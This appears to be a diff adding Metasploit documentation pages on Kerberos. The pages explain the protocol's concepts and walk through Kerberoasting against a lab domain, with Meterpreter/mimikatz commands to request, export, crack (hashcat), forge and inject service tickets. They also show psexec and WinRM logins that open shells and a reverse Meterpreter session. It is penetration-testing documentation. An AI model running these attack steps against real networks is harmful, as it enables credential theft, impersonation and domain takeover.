+   2. Do: `set action ENUM_USER_SPNS_KERBEROAST`
+   3. Run the module and note the discovered SPNs
+3. From your Meterpreter session:
+   1. Do: `load kiwi`
+   2. Do: Request a kerberos ticket for SPN found by the ldap_query module: `kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000`
+   3. Do: `kerberos_ticket_list`
+4. Export service tickets using the kiwi extension
+   1. Do: `kiwi_cmd kerberos::list /export`
+5. Crack the encrypted password in the service ticket using tgsrepcrack.py (more info on this python script below)
+   1. Do:  `python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\~testService-EXAMPLE.COM.kirbi`
+6. Rewrite the service tickets using kerberoast.py (more info on this python script below)
+   1. Do:  `python3  kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500`
+7. Finally inject the ticket back into RAM using Meterpreter's kiwi extension
+   1. `meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi`
+
+First an SPN needs to be found. This can be done in a number of ways - including using metasploit's
+very own `auxiliary/gather/ldap_query` module:
+
+```
+msf6 > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
+RHOSTS => 172.16.199.235
+msf6 auxiliary(gather/ldap_query) > set BIND_DN DARWIN_CLAY
+BIND_DN => DARWIN_CLAY
+msf6 auxiliary(gather/ldap_query) > set BIND_PW N0tpassword!
+BIND_PW => N0tpassword!
+msf6 auxiliary(gather/ldap_query) > set action ENUM_USER_SPNS_KERBEROAST
+action => ENUM_USER_SPNS_KERBEROAST
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.16.199.235
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 172.16.199.235:389 Getting root DSE
+dn:
+namingcontexts: DC=example,DC=com
+namingcontexts: CN=Configuration,DC=example,DC=com
+namingcontexts: CN=Schema,CN=Configuration,DC=example,DC=com
+
+...
+
+======================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cn                    BERYL_SAVAGE
+ samaccountname        BERYL_SAVAGE
+ serviceprincipalname  CIFS/OGCWLPT1000000
+
+CN=CAITLIN_CAMPBELL OU=Devices OU=FIN OU=Tier 1 DC=example DC=com
+=================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cn                    CAITLIN_CAMPBELL
+ samaccountname        CAITLIN_CAMPBELL
+ serviceprincipalname  ftp/BDEWSECS1000000
+
+CN=NETTIE_BURNS OU=ITS OU=Stage DC=example DC=com
+=================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cn                    ALBERTO_OLSEN
+ samaccountname        ALBERTO_OLSEN
+ serviceprincipalname  https/TSTWWKS1000002
+
+CN=LESSIE_PHILLIPS OU=Test OU=GOO OU=Stage DC=example DC=com
+============================================================
+
+```
+
+Great, we now have a couple SPNs to move forward with.
+
+**Request Service Tickets - with kiwi**
+
+If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs
+found above:
+
+```
+meterpreter > load kiwi
+Loading extension kiwi...
+
+  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+ '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
+  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
+
+Success.
+meterpreter > kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000
+Asking for: https/TSTWLPT1000000
+   * Ticket Encryption Type & kvno not representative at screen
+
+	   Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
+	   Service Name (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM
+	   Target Name  (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM
+	   Client Name  (01) : Administrator ; @ EXAMPLE.COM
+	   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
+	   Session Key       : 0x00000017 - rc4_hmac_nt
+	     07137dd7d5b801ef8b05c73380b18701
+	   Ticket            : 0x00000017 - rc4_hmac_nt       ; kvno = 0	[...]
+
+```
+
+Tickets in the current session can be viewed like so:
+
+```
+
+meterpreter > kerberos_ticket_list
+[+] Kerberos tickets found in the current session.
+[00000000] - 0x00000012 - aes256_hmac
+   Start/End/MaxRenew: 12/16/2022 3:35:41 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
+   Server Name       : krbtgt/EXAMPLE.COM @ EXAMPLE.COM
+   Client Name       : Administrator @ EXAMPLE.COM
+   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
+
+[00000001] - 0x00000017 - rc4_hmac_nt
+   Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
+   Server Name       : https/TSTWLPT1000000 @ EXAMPLE.COM
+   Client Name       : Administrator @ EXAMPLE.COM
+   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
+```
+
+**Export Service Tickets**
+
+```
+meterpreter > kiwi_cmd kerberos::list /export
+
+[00000001] - 0x00000017 - rc4_hmac_nt
+   Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM
+   Server Name       : https/TSTWLPT1000000 @ EXAMPLE.COM
+   Client Name       : Administrator @ EXAMPLE.COM
+   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
+====================
+Base64 of file : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi
+====================
+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
+MDAwMA==
+====================
+
+   * Saved to file     : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi
+```
+
+**Crack Kiwi's Service Tickets**
+
+To crack the service ticket a number of tools can be used. In this example we'll use hashcat. First we need to convert
+the ticket we retrieved in the `.kirbi` format to a format parsable by hashcat. The script **kirbi2john** is part of
+[Tim Medin](https://twitter.com/TimMedin) [Kerberoast](https://github.com/nidem/kerberoast) toolkit is perfect for
+this task.
+
+First clone the repo then run the script against the `.kirbi` file.
+
+```
+msfuser@ubuntu:~/git$ git clone https://github.com/nidem/kerberoast.git
+msfuser@ubuntu:~/git$ cd kerberoast
+msfuser@ubuntu:~/git/kerberoast$ python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi
+$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140
+3a1808746b35d0e99159553e3c81a9cd32a51e968a4b45ce3fcf08e5eac8d4551df10c9f1bd4572cc273d1bd154fc8fd1228d55cd39a90b64ec3117f
+e0a1fb496d1be4042ccb2998d998fa3de8f50bcb04d3bf78e34be07d71310a3be829e24cb75c398847f960aefe9669534df26344beb6e7bbe628b7ac
+fa957c4a67417546fc441b84aaee78a0e5256cc9dead287327ac7907af71e02b142027c9061515c72ef03c842d0f73754f9dffa434a26057df4c4434
+71cd5bf76260469ea6f1c367a64ea02b01a2b9c2b83979911fc58fa8822c70877b72370078e3d7955fc2ade02acd2a803889a8c3a609f80f9beb45c0
+981aba6bdbb208fa6ea2cc91814c8c4dd6e9287f4ef3b9e2b7febe07648c78ec25137e82bee0d99290a33fd3701953bd858fac15c6d1652f11cc75a6
+e419cab7dec019e599eda3a76652475968bc2845fa6f02477efaecfd63e58fad817f1976adeda14b2c4c1508a84df1813e05368c3e07c9f656d5730d
+848b86c59bf576f4c2505375b7d6934abf8a955b1a71d802026383cbd9005bf12f0664ffc25ebee8aef4b574dd93850d59fc16c5f9881e9b4f957c33
+74724e4046c0fa4bc5ff16b9a960b4b6a2ede25bb18c617c2dbcfb3fd34a4cc3ee29fb0f6e6f43722ffc50ceddce55b2be1a53361d13c983980d3191
+86c7dbd124a3c8f19560e88d0d858b0f5320738931bf2f32c1e893fbbadb92f7574128f6f36a0acab99023f79d857f15f0920a1a76b3a97e6282d4e6
+c5ef30206444bc20da1a7d89d1007a97e75ffb9554cfeaf6757919a635dbdfcfd74d2eec8d5f83f109beb6e653a8c0e787ec039c7bb93d07a60e8bb4
+b56d026e809a80e020875a3a382b367f28c0e41714bd5ef97da578956cba12ab1fbcd84a5313d2edc5f7c601c3c56860a347ab013f50e3f8e6167935
+9db05e4014db38e21a814fe002ba14d17840aa053bbec3a6aadec31db50827168d24107486d373567c2969215c0decf639bc46b9968e43a79bc6f261
+2544feb09908118615035f630e37b03cb04d9725d2085a28543575d91c361bf1b6a61837d6c34c8961df33d1b8b45963bf361d33e0ca2fa37b40e62b
+6389ebb0ad4097036f4d6aa4598086313ea79d68f75301d5038783567c2fdcf25e2b459acdc867c64613fe84f3faf1fdb79fc6e05322b2175eec3b2e
+84e3a8165f0af265d3ccd994712704516f0c78f76dd7c5c98f8fc8b9db1231f19c259bc7f078a86d4bc6cf06b8c4158dc41f48dd51b146d3fc63d2fd
+f057e6644f838a944de0679ab3e8c6290d4d8004bd53570f61323eeb7c910c6546880a508172bf4ee2fa1c87748ec0e2e2f79e03e963affb593f1391
+a62fdf2f29b792b1c0e7ece2645381a4284b56ddc525c842589eca39efa0466418c9bfb60df479015f4fac86d38575aad1f29674a12d873f8fc12415
+b6ea7b2cb15c9d422f0f904a6af518f12c4e0e362093d8d33a47672973f6d70e80669666f37d6674ef8e2999c92fa38b5de8e266716bb182527bde17
+36bcb926a6340ae92f8b338be2fe5fa3a757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2698d17fff4
+f9f1ecd02102f5bbd222b039ca3e30fed4003be6b70b2e492c8ea5eee92439681d6af767547609a87d47b68ba7ca62dbe3e4bf74e081915ab15e4103
+8839b74263ddbd087c90b6262dd5684e078068c28ccc0c115e3
+tickets written: 1
+```
+
+Copy the above hash to a file called hash.txt.
+
+Ensure hashcat is installed: `msfuser@ubuntu:~/git/kerberoast$ sudo apt install hashcat`
+
+With a word list of your choice run the following command:
+
+```
+msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt
+hashcat (v5.1.0) starting...
+
+OpenCL Platform #1: The pocl project
+====================================
+* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 16384/41063 MB allocatable, 6MCU
+
+Hashes: 1 digests; 1 unique digests, 1 unique salts
+Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+Rules: 1
+
+Applicable optimizers:
+* Zero-Byte
+* Not-Iterated
+* Single-Hash
+* Single-Salt
+
+Minimum password length supported by kernel: 0
+Maximum password length supported by kernel: 256
+
+ATTENTION! Pure (unoptimized) OpenCL kernels selected.
+This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
+If you want to switch to optimized OpenCL kernels, append -O to your commandline.
+
+Watchdog: Hardware monitoring interface not found on your system.
+Watchdog: Temperature abort trigger disabled.
+
+* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64
+ -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3
+ -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
+ 
+* Device #1: Kernel m13100_a0-pure.64a04b9e.kernel not found in cache! Building may take a while...
+Dictionary cache built:
+* Filename..: wordlist.txt
+* Passwords.: 3
+* Bytes.....: 33
+* Keyspace..: 3
+* Runtime...: 0 secs
+
+The wordlist or mask that you are using is too small.
+This means that hashcat cannot use the full parallel power of your device(s).
+Unless you supply more work, your cracking speed will drop.
+For tips on supplying more work, see: https://hashcat.net/faq/morework
+
+Approaching final keyspace - workload adjusted.
+
+$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140
+<truncated due to size>
+
+Session..........: hashcat
+Status...........: Cracked
+Hash.Type........: Kerberos 5 TGS-REP etype 23
+Hash.Target......: $krb5tgs$23$*1-40a10000-Administrator@HTTP~testServ...c115e3
+Time.Started.....: Tue Jan 10 07:41:11 2023 (0 secs)
+Time.Estimated...: Tue Jan 10 07:41:11 2023 (0 secs)
+Guess.Base.......: File (wordlist.txt)
+Guess.Queue......: 1/1 (100.00%)
+Speed.#1.........:       26 H/s (0.03ms) @ Accel:32 Loops:1 Thr:64 Vec:8
+Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
+Progress.........: 3/3 (100.00%)
+Rejected.........: 0/3 (0.00%)
+Candidates.1.....: test123  -> N0tpassword!
+```
+
+If you want to view the hash + cracked password at a later date run the above command with `--show` appended.
+
+```
+msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt --show
+$krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140
+<truncated due to size>
+39efa046757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2695476093ddbd087c115e3:N0tpassword!
+```
+
+**Rewrite Service Tickets & RAM Injection**
+
+Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible
+to rewrite the ticket with [Kerberoast](https://github.com/nidem/kerberoast) python script. This tactic will allow users
+to impersonate any domain user or a fake account when the service is going to be accessed. Additionally privilege
+escalation is also possible as the user can be added into an elevated group such as Domain Admins.
+
+```
+➜  kerberoast git:(master) ✗ python3  kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500
+```
+
+The new ticket can be injected back into the memory with the following Mimikatz command in order to perform
+authentication with the targeted service via Kerberos protocol.
+
+```
+meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi
+```
@@ -0,0 +1,110 @@
+## What is Kerberos?
+
+Kerberos is an authentication protocol. In response to a client proving their identity, Kerberos generates tickets which
+can be used to further interact with systems as a proof of identity. Kerberos is not used for authorization. NTLM is an
+alternative authentication protocol implemented in Microsoft Products. The difference between authentication and authorization is:
+
+- Authentication - Verification of identity
+- Authorization - Verification of access rights. This takes place after authentication.
+
+Kerberos can be found on the following ports:
+
+- 88/TCP - More frequently used, and supported by Metasploit
+- 88/UDP - Currently not supported by Metasploit
+
+Metasploit currently provides modules for requesting authentication tickets, forging tickets, exploitation, and more.
+
+## Core Concepts
+
+### Key Distribution Centre
+
+The Key Distribution center consists of two parts. The Authentication server (AS) and the Ticket Granting Server (TGS).
+
+The Authentication server (AS) performs the client authentication process. Authentication is generally performed using a
+secret key such as the user's password - but other methods such exist such as `pkinit` which relies on public keys for authentication.
+If authentication is successful, the authentication server will return a new Ticket Granting Ticket (TGT).
+
+The Ticket Granting Server requires a user's TGT, and the service details that the user would like to gain access to. These
+Service Tickets used are for gaining access to services such as SMB/WinRM/etc. In most Kerberos pentesting tools, including Metasploit, the granted
+Service Tickets are called TGS.
+
+### Service Principal Name
+
+A ([SPN](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/cd328386-4d97-4666-be33-056545c1cad2)) is a forest unique string.
+It associates a service to a service logon account. The SPN is set on a user computer object via the [AD Schema](https://learn.microsoft.com/en-us/windows/win32/adschema/a-serviceprincipalname).
+Generally the SPN follows the format `<service class>/<host><realm>:<port>/<service name>`.
+
+A service can have multiple SPNs. On a Window's Domain Controller you can view the available SPNs with the `setspn -q */*` command. 
+
+### Security identifiers
+
+In the context of Microsoft's Active Directory - Security identifiers (SID) are used to uniquely identify users, groups, and
+computer accounts. This knowledge is required when using the [[auxiliary/admin/kerberos/forge_ticket|pentesting/active-directory/kerberos/forge_ticket.md]] module.
+
+An example of a SID is `S-1-5-21-1266190811-2419310613-1856291569-500`, which can be described as:
+
+```
+S-1-5-21        1266190811-2419310613-1856291569    500
+^ SID prefix    ^ Domain Identifier                 ^ Relative ID - the Administrator account
+```
+
+You can view SIDs on a domain controller with:
+
+```
+C:\Users\Administrator>wmic useraccount get name, sid
+Name                 SID
+Administrator        S-1-5-21-1266190811-2419310613-1856291569-500
+Guest                S-1-5-21-1266190811-2419310613-1856291569-501
+krbtgt               S-1-5-21-1266190811-2419310613-1856291569-502
+DefaultAccount       S-1-5-21-1266190811-2419310613-1856291569-503
+```
+
+## Authentication example
+
+Below is an example authentication workflow in Kerberos for authenticating to an SMB service running on Windows:
+
+- Step 1. Request TGT
+    - AS_REQ
+        - Generate Kerberos Encryption key from user credentials
+    - AS_REP
+      - Returned after verifying the encrypted timestamp
+      - The client stores later usage to request future service tickets
+- Step 2. Request Service Ticket
+    - TGS_REQ
+        - Use the TGT from Step 1
+        - Specify the required SPN (Service principal name), i.e. `cifs/host.realm.local`
+    - TGS_REP
+        - Receive new TGS which can be used with a service
+- Step 3. Interact with service
+    - AP_REQ
+        - Send the service ticket
+    - AP_REP
+        - Success/Failure information
+
+```mermaid
+sequenceDiagram
+    participant msf as metasploit
+    participant kdc as Kerberos
+    participant smb as smb
+
+    Note over msf,kdc: 1) Request Ticket Granting Ticket - TGT
+    msf->>kdc: AS_REQ<br >encKey = EncKeyFor(user, pass, realm)<br >sname = krbtgt/realm
+    kdc->>msf: AS_REP<br >TGT
+
+    Note over msf,kdc: 2) Request Service Ticket - TGS
+    msf->>kdc: TGS_REQ<br>Ticket<br>spn=cifs/host.domain.local
+    kdc->>msf: TGS_REP<br>TGS
+
+    Note over msf,kdc: 3) Request Service Access
+    msf->>smb: AP_REQ<br>Service Ticket
+    smb->>msf: AP_REP
+```
+
+## Common Kerberos workflows
+
+- User enumeration / bruteforcing - the [[auxiliary/scanner/kerberos/kerberos_login|pentesting/active-directory/kerberos/kerberos_login.md]] module can be used to enumerate user accounts or bruteforce credentials
+- AS-REP Roasting - Some Kerberos accounts may be configured with a `Do not require Kerberos preauthentication` flag. For these accounts a Kerberos TGT will be returned by the KDC without needing to authenticate. These TGTs can be bruteforced to learn the original user's credentials. The [[auxiliary/scanner/kerberos/kerberos_login|pentesting/active-directory/kerberos/kerberos_login.md#asreproasting]] module implements this workflow.
+- Forging Tickets - After compromising a KDC or service account it is possible to forge tickets for persistence. The [[auxiliary/admin/kerberos/forge_ticket|pentesting/active-directory/kerberos/forge_ticket.md]] module can forge both Golden and Silver tickets.
+- Inspecting Tickets - Kerberos tickets can be inspected with the [[auxiliary/admin/kerberos/inspect_ticket|pentesting/active-directory/kerberos/inspect_ticket.md]] module. If the encryption key is known, the decrypted contents can be displayed.
+- [[Service authentication|kerberos/service_authentication.md]] - Using Kerberos to authenticate via services suh as WinRM/Microsoft SQL Server/SMB/LDAP/etc
+- [[Kerberoasting|kerberos/kerberoasting.md]] - Finding services in Active Directory that are associated with normal user accounts which may have brute forcible encryption keys that lead to Active Directory credentials.
@@ -0,0 +1,257 @@
+## Service Authentication 
+
+Since version 6.3, Metasploit has included authentication via Kerberos for multiple types of modules. Kerberos
+authentication allows Metasploit users to request and utilize Ticket Granting Tickets (TGTs) and Ticket Granting
+Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage machanism but
+tickets are stored able to be both exported and imported from [MIT Credential Cache][1] (CCACHE) files. A converter for
+Kirbi to and from CCACHE files is also available in the `auxiliary/admin/kerberos/ticket_converter` module.
+
+Metasploit currently offers Kerberos authentication for the following services - see the below references for more details and examples:
+
+- [[SMB Kerberos Authentication|Metasploit-Guide-SMB.md]]
+- [[WinRM Kerberos Authentication|Metasploit-Guide-WinRM.md]]
+- [[LDAP Kerberos Authentication|Metasploit-Guide-LDAP.md]]
+- [[MSSQL Kerberos Authentication|Metasploit-Guide-MSSQL.md]]
+
+### Examples
+
+Open a WinRM session:
+
+```
+msf6 > use auxiliary/scanner/winrm/winrm_login
+msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
+[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
+[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+C:\Users\Administrator>
+```
+
+Query LDAP for accounts:
+
+```
+msf6 > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+[*] Running module against 192.168.123.13
+
+[+] 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
+[+] 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
+[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
+CN=Administrator CN=Users DC=adf3 DC=local
+==========================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ pwdlastset          133184302034979121
+ samaccountname      Administrator
+ useraccountcontrol  512
+ ... etc ...
+```
+
+Running psexec against a host:
+
+```
+msf6 > use exploit/windows/smb/psexec
+msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.13:445 - Connecting to the server...
+[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
+[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
+[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
+[*] 192.168.123.13:445 - Selecting PowerShell target
+[*] 192.168.123.13:445 - Executing the payload...
+[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.123.13
+[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
+
+meterpreter >
+```
+
+Connect to a Microsoft SQL Server instance and run a query:
+
+```
+msf6 > use auxiliary/admin/mssql/mssql_sql
+msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+[*] Reloading module...
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
+[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
+[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
+[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
+[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)
+
+ auth_scheme
+ -----------
+ KERBEROS
+
+[*] Auxiliary module execution completed
+```
+
+### Options
+
+Kerberos authentication requires additional options to be set. Some of them are prefixed with the protocol the module
+is authenticating. For example, the PSexec module which operates over SMB would use the "SMB" prefix.
+
+Required options:
+* `${Prefix}::Auth` -- The authentication modes this module supports. Set it to "kerberos" to use Kerberos authentication. i.e. `Smb::Auth=kerberos`
+* `${Prefix}::Rhostname` -- The hostname of the target system. This value should be either the hostname `WIN-MIJZ318SQH` or
